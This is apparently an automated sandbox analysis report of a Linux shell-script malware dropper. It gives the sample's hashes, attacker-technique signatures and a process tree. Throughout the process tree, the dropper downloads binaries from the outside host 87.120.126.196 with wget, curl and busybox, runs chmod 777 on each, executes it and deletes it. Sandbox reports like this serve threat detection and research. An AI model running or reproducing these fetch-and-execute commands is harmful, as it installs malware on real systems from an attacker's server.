Analysis
-
max time kernel
32s -
max time network
59s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28/10/2024, 02:38
Static task
static1
Behavioral task
behavioral1
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
-
Size
10KB
-
MD5
b2db94a95f3a12911c7e79383b2e9f18
-
SHA1
17b862a1f3cda3d5cbfb97bc0bcbd640f72f4fd3
-
SHA256
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c
-
SHA512
3b76d645c8332a5801de9ec5563c4376494571a0736d91e22743912fb8c2b2b3670146be65fa21f4b9a8a080d77960aa2f96e6a437a5f58f219da6c0e23f36c6
-
SSDEEP
192:HfsfQf5fkfMfaLD/WzzdGflUflcflNflQflcflLVzDwrSaqbNhxoZluTFhm9l+I5:/WClO2aLD/WzzdG6mLiKNPZxhxoZluT4
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 903 chmod 698 chmod 726 chmod 829 chmod 847 chmod 789 chmod 817 chmod 841 chmod 853 chmod 909 chmod 752 chmod 891 chmod 918 chmod 763 chmod 823 chmod 924 chmod 772 chmod 806 chmod 865 chmod 877 chmod 885 chmod 897 chmod 932 chmod 938 chmod 691 chmod 835 chmod 859 chmod 871 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O 692 DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O /tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi 699 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi /tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9 727 XyZdblDqLyEULjRaeONlljVYqcQOHReoK9 /tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo 753 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo /tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl 764 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl /tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt 774 tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt /tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue 791 ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue /tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq 807 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq /tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z 818 PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z /tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9 824 ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9 /tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8 830 bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8 /tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq 836 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq /tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y 842 cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y /tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU 848 454cMOdzouNcZgCP0raVamPmDNLroMiGgU /tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9 854 XyZdblDqLyEULjRaeONlljVYqcQOHReoK9 /tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo 860 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo /tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O 866 DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O /tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi 872 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi /tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue 878 ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue /tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl 886 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl /tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt 892 tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt /tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9 898 ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9 /tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8 904 bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8 /tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq 910 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq /tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq 919 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq /tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z 925 PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z /tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y 933 cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y /tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU 939 454cMOdzouNcZgCP0raVamPmDNLroMiGgU -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9 curl File opened for modification /tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo curl File opened for modification /tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq curl File opened for modification /tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O curl File opened for modification /tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt curl File opened for modification /tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue curl File opened for modification /tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9 curl File opened for modification /tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8 curl File opened for modification /tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O curl File opened for modification /tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z curl File opened for modification /tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl curl File opened for modification /tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt curl File opened for modification /tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8 curl File opened for modification /tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9 curl File opened for modification /tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl curl File opened for modification /tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq curl File opened for modification /tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU curl File opened for modification /tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z curl File opened for modification /tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU curl File opened for modification /tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo curl File opened for modification /tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq curl File opened for modification /tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi curl File opened for modification /tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue curl File opened for modification /tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y curl File opened for modification /tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi curl File opened for modification /tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y curl File opened for modification /tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9 curl File opened for modification /tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq curl
Processes
-
/tmp/62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh/tmp/62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh1⤵PID:661
-
/bin/rm/bin/rm bins.sh2⤵PID:663
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:668
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:676
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:685
-
-
/bin/chmodchmod 777 DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- File and Directory Permissions Modification
PID:691
-
-
/tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O./DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Executes dropped EXE
PID:692
-
-
/bin/rmrm DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:694
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:695
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:696
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:697
-
-
/bin/chmodchmod 777 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi./8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Executes dropped EXE
PID:699
-
-
/bin/rmrm 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:700
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:701
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:702
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:723
-
-
/bin/chmodchmod 777 XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9./XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Executes dropped EXE
PID:727
-
-
/bin/rmrm XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:728
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:729
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:740
-
-
/bin/chmodchmod 777 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo./0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:754
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:755
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:762
-
-
/bin/chmodchmod 777 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl./7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:766
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:768
-
-
/bin/chmodchmod 777 tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt./tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:775
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:776
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:786
-
-
/bin/chmodchmod 777 ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue./ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:802
-
-
/bin/chmodchmod 777 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq./31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:808
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:816
-
-
/bin/chmodchmod 777 PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z./PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:822
-
-
/bin/chmodchmod 777 ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9./ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:828
-
-
/bin/chmodchmod 777 bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8./bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:834
-
-
/bin/chmodchmod 777 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq./2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:837
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:838
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:840
-
-
/bin/chmodchmod 777 cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y./cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:843
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:844
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:846
-
-
/bin/chmodchmod 777 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU./454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:850
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:852
-
-
/bin/chmodchmod 777 XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9./XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:855
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:856
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:858
-
-
/bin/chmodchmod 777 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo./0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:864
-
-
/bin/chmodchmod 777 DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O./DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:870
-
-
/bin/chmodchmod 777 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi./8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:876
-
-
